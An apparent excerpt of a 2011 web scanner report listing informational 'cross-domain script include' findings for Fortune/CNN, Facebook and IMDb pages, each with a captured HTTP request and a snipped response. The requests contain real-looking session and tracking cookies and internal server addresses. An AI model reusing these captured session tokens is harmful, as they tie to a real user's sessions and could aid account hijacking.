s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ac%25253Amoney%25253A%25252F2011%25252F08%25252F15%25252Ftechnology%25252Fgoogle_motorola%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ftech.fortune.cnn.com%25252F2011%25252F08%25252F15%25252Fis-google-buying-motorola-for-its-17000-patents%25252F%25253Fiid%25253DEL%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Aug 2011 18:48:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Last-Modified: Mon, 15 Aug 2011 18:47:08 +0000
Cache-Control: max-age=197, must-revalidate
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://tech.fortune.cnn.com/xmlrpc.php
Link: <http://wp.me/pzwtX-ho8>; rel=shortlink
X-nananana: Batcache
Content-Length: 55611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en">
<!--
   generated 103 seconds ago
   generated in 0.223
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<script type="text/javascript" src="http://i.cdn.turner.com/money/.element/ssi/css/2.0/pkg/cnnmoney.blog/latest.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://i.cdn.turner.com/money/.element/script/2.0/pkg/cnnmoney.main/latest.js"></script>
<script type="text/javascript" src="http://i.cdn.turner.com/money/.element/script/jquery/1.5.1/jquery.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://i.cdn.turner.com/money/fn_adspaces/cnn_adspaces.js"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://cache-01.cleanprint.net/cp/ccg?divId=2435&ps=427' name='cleanprintloader'></script>
       <script src='http://wordpress.com/remote-login.php?action=js&amp;host=tech.fortune.cnn.com&amp;id=8466345&amp;t=1313434028&amp;back=tech.fortune.cnn.com%2F2011%2F08%2F15%2Fis-google-buying-motorola-for-its-17000-patents%2F' type="text/javascript"></script>
...[SNIP]...
<link rel='stylesheet' id='post-reactions-css' href='http://s0.wp.com/wp-content/mu-plugins/post-react-2/style.css?m=1313420637g&#038;ver=2' type='text/css' media='all' />
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/jquery/jquery.js?m=1305826089g&amp;ver=1.6.1'></script>
...[SNIP]...
<div id="cnnHeader" class="moneyTechNav">
       <script language="JavaScript" src="http://i.cdn.turner.com/money/.element/ssi/javascript/1.1/cnnhat_section.js"></script>
...[SNIP]...
<!-- omniture & biztracking must be called separately -->    <script language="JavaScript" src="http://z.cdn.turner.com/money/.element/script/4.0/omniture/jsmd.js?20110803"></script>
...[SNIP]...
<!-- Start Quantcast Measurement tag -->
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
   <script src="http://js.revsci.net/gateway/gw.js?csid=H07710"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
<script type="text/javascript" src="http://i.cdn.turner.com/money/.element/script/2.0/pkg/cnnmoney.blog/latest.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?w&#038;ver=MU'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1311367665g&amp;ver=MU'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</noscript><script src="http://s.stats.wordpress.com/w.js?20" type="text/javascript"></script>
...[SNIP]...

14.32. http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tech.fortune.cnn.com
Path:   /2011/08/15/is-google-buying-motorola-for-its-17000-patents/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/08/15/is-google-buying-motorola-for-its-17000-patents/?hpt=hp_t2 HTTP/1.1
Host: tech.fortune.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=cnn-adbp-domestic%3D%2526pid%253Dcnn%25253Ain%25253A%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ftech.fortune.cnn.com%25252F2011%25252F08%25252F15%25252Fis-google-buying-motorola-for-its-17000-patents%25252F%25253Fhpt%25253Dhp_t2%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Aug 2011 18:45:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Last-Modified: Mon, 15 Aug 2011 18:42:08 +0000
Cache-Control: max-age=78, must-revalidate
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://tech.fortune.cnn.com/xmlrpc.php
Link: <http://wp.me/pzwtX-ho8>; rel=shortlink
X-nananana: Batcache
Content-Length: 55624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en">
<!--
   generated 222 seconds ago
   generated in 0.232
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<script type="text/javascript" src="http://i.cdn.turner.com/money/.element/ssi/css/2.0/pkg/cnnmoney.blog/latest.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://i.cdn.turner.com/money/.element/script/2.0/pkg/cnnmoney.main/latest.js"></script>
<script type="text/javascript" src="http://i.cdn.turner.com/money/.element/script/jquery/1.5.1/jquery.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://i.cdn.turner.com/money/fn_adspaces/cnn_adspaces.js"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://cache-01.cleanprint.net/cp/ccg?divId=2435&ps=427' name='cleanprintloader'></script>
       <script src='http://wordpress.com/remote-login.php?action=js&amp;host=tech.fortune.cnn.com&amp;id=8466345&amp;t=1313433728&amp;back=tech.fortune.cnn.com%2F2011%2F08%2F15%2Fis-google-buying-motorola-for-its-17000-patents%2F%3Fhpt%3Dhp_t2' type="text/javascript"></script>
...[SNIP]...
<link rel='stylesheet' id='post-reactions-css' href='http://s2.wp.com/wp-content/mu-plugins/post-react-2/style.css?m=1313420638g&#038;ver=2' type='text/css' media='all' />
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/jquery/jquery.js?m=1308950269g&amp;ver=1.6.1'></script>
...[SNIP]...
<div id="cnnHeader" class="moneyTechNav">
       <script language="JavaScript" src="http://i.cdn.turner.com/money/.element/ssi/javascript/1.1/cnnhat_section.js"></script>
...[SNIP]...
<!-- omniture & biztracking must be called separately -->    <script language="JavaScript" src="http://z.cdn.turner.com/money/.element/script/4.0/omniture/jsmd.js?20110803"></script>
...[SNIP]...
<!-- Start Quantcast Measurement tag -->
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
   <script src="http://js.revsci.net/gateway/gw.js?csid=H07710"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
<script type="text/javascript" src="http://i.cdn.turner.com/money/.element/script/2.0/pkg/cnnmoney.blog/latest.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?w&#038;ver=MU'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1311367674g&amp;ver=MU'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</noscript><script src="http://s.stats.wordpress.com/w.js?20" type="text/javascript"></script>
...[SNIP]...

14.33. http://www.cnn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnn.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.cnn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:44:51 GMT
Server: Apache
Set-Cookie: CG=US:--:--; path=/
Accept-Ranges: bytes
Cache-Control: max-age=60, private, private
Expires: Mon, 15 Aug 2011 18:45:51 GMT
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Content-Length: 101975
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><title>CNN.com - Breaking News, U.S., World, Weather, Entertainment &amp; Vid
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://i.cdn.turner.com/cnn/.element/css/3.0/blackout.css">

<script type="text/javascript" src="http://z.cdn.turner.com/cnn/.element/js/3.0/protoaculous.1.8.2.min.js"></script>
<script type="text/javascript" src="http://z.cdn.turner.com/cnn/.element/js/3.0/swfobject-2.2.js"></script>

<script type="text/javascript" src="http://z.cdn.turner.com/cnn/.element/js/3.0/main.js"></script>
<script type="text/javascript" src="http://z.cdn.turner.com/cnn/.element/js/3.0/csiManager.js"></script>
<script type="text/javascript" src="http://z.cdn.turner.com/cnn/.element/js/3.0/StorageManager.js"></script>
<script type="text/javascript" src="http://z.cdn.turner.com/cnn/.element/js/3.0/connect/connect-lite.js"></script>
<script type="text/javascript" src="http://z.cdn.turner.com/cnn/.element/js/3.0/local.js"></script>
...[SNIP]...
<!--include virtual="/.element/ssi/auto/3.0/sect/MAIN/videojs.html"-->
<script src="http://i.cdn.turner.com/cnn/.element/js/3.0/video/cvp_suppl.js?id=20100816" type="text/javascript"></script>
<script src="http://i.cdn.turner.com/cnn/.element/js/3.0/video/cvp.js" type="text/javascript"></script><script src="http://i.cdn.turner.com/xslo/cvp/ads/freewheel/js/fwjslib_1.1.js?version=1.1" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://i.cdn.turner.com/cnn/.element/js/2.0/frame.js"></script>
<script type="text/javascript" src="http://i.cdn.turner.com/cnn/.element/js/2.0/ad_head0.js"></script>
<script type="text/javascript" src="http://i.cdn.turner.com/cnn/cnn_adspaces/cnn_adspaces.js"></script>
...[SNIP]...
<!-- /cnn_ftrcntnt -->
<script type="text/javascript" src="http://i.cdn.turner.com/cnn/.element/js/3.0/weather.footer.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://i.cdn.turner.com/cnn/.element/js/3.0/edition.vars.js"></script>
...[SNIP]...
<!--include virtual="/.element/ssi/www/misc/3.0/omni/omniture.exe.html" -->
<script src="http://content.dl-rms.com/rms/mother/5721/nodetag.js"></script>
<script language="javascript" src="http://icompass.insightexpressai.com/97.js"></script>

<script language="JavaScript" src="http://z.cdn.turner.com/cnn/.element/js/3.0/jsmd.js"></script>
...[SNIP]...
</script>


<script src="http://i.cdn.turner.com/cnn/.element/js/3.0/hpsectiontracking.js"></script>
...[SNIP]...
<img src="http://i.cdn.turner.com/cnn/images/1.gif" alt="" id="TargetImageDE" name="TargetImageDE" width="1" height="1" onLoad="getDEAdHeadCookie(this)">

<script src="http://js.revsci.net/gateway/gw.js?csid=A09801"></script>
...[SNIP]...

14.34. http://www.cnn.com/.element/ssi/misc/3.0/editionvars.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnn.com
Path:   /.element/ssi/misc/3.0/editionvars.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /.element/ssi/misc/3.0/editionvars.html?&csiID=csi2 HTTP/1.1
Host: www.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; tnr:usrvtstg01=1313433954593%7C0%7C0%7C1%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C1%7Cf%7C1%7C7%7C1313433954593; tnr:sesctmp01=1313433954593; s_cc=true; s_sq=%5B%5BB%5D%5D; CG=US:--:--; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:08 GMT
Server: Apache
Set-Cookie: CG=US:--:--; path=/
Accept-Ranges: bytes
Cache-Control: max-age=60, private, private
Expires: Mon, 15 Aug 2011 18:45:13 GMT
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Content-Length: 9596
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script>
                       
...[SNIP]...
</script><script type="text/javascript" src="http://i.cdn.turner.com//cnn/.element/js/3.0/csi_include.js"></script>
...[SNIP]...

14.35. http://www.facebook.com/ConanTheBarbarian  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ConanTheBarbarian

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ConanTheBarbarian?sk=app_108503912579284 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; rdir=/login.php

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dapp_108503912579284; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.43.49
X-Cnection: close
Date: Mon, 15 Aug 2011 18:24:20 GMT
Content-Length: 49693

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:og="http://opengraphprotocol.org/schema/" lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>Cav
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/gjR314n9JTe.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/7phT2ydMzW6.js"></script>
...[SNIP]...

14.36. http://www.facebook.com/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /login.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ia.media-imdb.com/images/M/MV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg@@._V1_.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; datr=pG8pTrLcOF5vWXJLyEMRGq7p; lsd=yxUAz; next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; next_path=%2Fhome.php

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=pG8pTrLcOF5vWXJLyEMRGq7p; expires=Wed, 14-Aug-2013 18:26:50 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.228.27
X-Cnection: close
Date: Mon, 15 Aug 2011 18:26:50 GMT
Content-Length: 17097

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/login.php";window._EagleEyeSeed="27lC";</script><noscript
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/vIpx6O3T-P_.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/7phT2ydMzW6.js"></script>
...[SNIP]...

14.37. http://www.facebook.com/media/set/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /media/set/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media/set/?set=a.206519616063696.51681.146642365384755 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=photos
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dphotos; wd=1123x954; x-src=%2Fmedia%2Fset%2F%7Cpagelet_photo_albums; act=1313433588181%2F1; _e_mTli_0=%5B%22mTli%22%2C1313433588184%2C%22act%22%2C1313433588181%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755%22%2C%22click%22%2C%22click%22%2C%22photo_albums%22%2C%22r%22%2C%22%2F%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C328%2C584%2C63%2C981%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: x-src=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.237.31
X-Cnection: close
Date: Mon, 15 Aug 2011 18:38:52 GMT
Content-Length: 172809

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/media\/set\/index.php";window._EagleEyeSeed="QNCv";</scri
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/gjR314n9JTe.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/7phT2ydMzW6.js"></script>
...[SNIP]...

14.38. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/likebox.php?href=facebook.com%2Fimdb&width=300&connections=5&stream=false&header=false&height=190 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; datr=pG8pTrLcOF5vWXJLyEMRGq7p

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.36.45
X-Cnection: close
Date: Mon, 15 Aug 2011 18:23:58 GMT
Content-Length: 11024

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/gvrW9GGxv2y.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/7phT2ydMzW6.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/U-hWvICPM7_.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/Qcl4G42wSa6.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/BNIl95--AXH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/L8yUExs-fkD.js"></script>
...[SNIP]...

14.39. http://www.imdb.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imdb.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session-id=566-3426531-3253648; session-id-time=1471106531; uu=BCYi7R4nLigv6I99LFBjSIAuEddX-KoeNGrGwEyY3WLQG62GqVCzq3wtfNa--fIIlQS89mwCuhGENBF4itU92DAVM_GAGwBP5lNi1BDuS0a5lpoVlWYteWxx3KI0-4AEyUS59gqLYZTSDynEXEgu3CGNTBK5Onalb_6-mCZkE0o80JAHzCmRzqHGO53KGIQd_37YoDNPUPJK052tfjxJd7T6ueGjV3HdByAliaGCLnQJsgzuhhgsVYxeGebYAciXWo3ZULP-6AeTuOIASfVQ0SYYgu6pk8iC7JncA19rxzzNZj1ceE9keGergJpspPQ8PR_O; cs=9FHDartxepMs4zicyTf0jAhZEiSO2SRj2v5SJImOITet6mUy+I4ChC7ZEhO2mZq0jYqRVA3qUQfuegEXntkSFCmZUgSO2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=; __utma=168836921.779117687.1313426596.1313426596.1313426596.1; __utmz=168836921.1313426596.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); us=s%3D1009%3Bs%3D32%3Bs%3Dc5%3Bs%3Dc4%3Bs%3Dc4%3Bs%3Dc1%3Bs%3Dc17%3Bs%3Dc12%3B

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:23:53 GMT
Server: Server
Cache-Control: private
Cneonction: close
Content-Type: text/html
Set-Cookie: cs=gIlM8TPFrbxqJMVtH7h0awfH7bqgkW2M5Pd5qqOiCL0Gxn0a0JFtjZjx5Qqj8l6KI6IuiYAyfomwkW2KB9EtmqCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==;expires=Tue, 16 Aug 2011 07:00:00 GMT;path=/;domain=.imdb.com
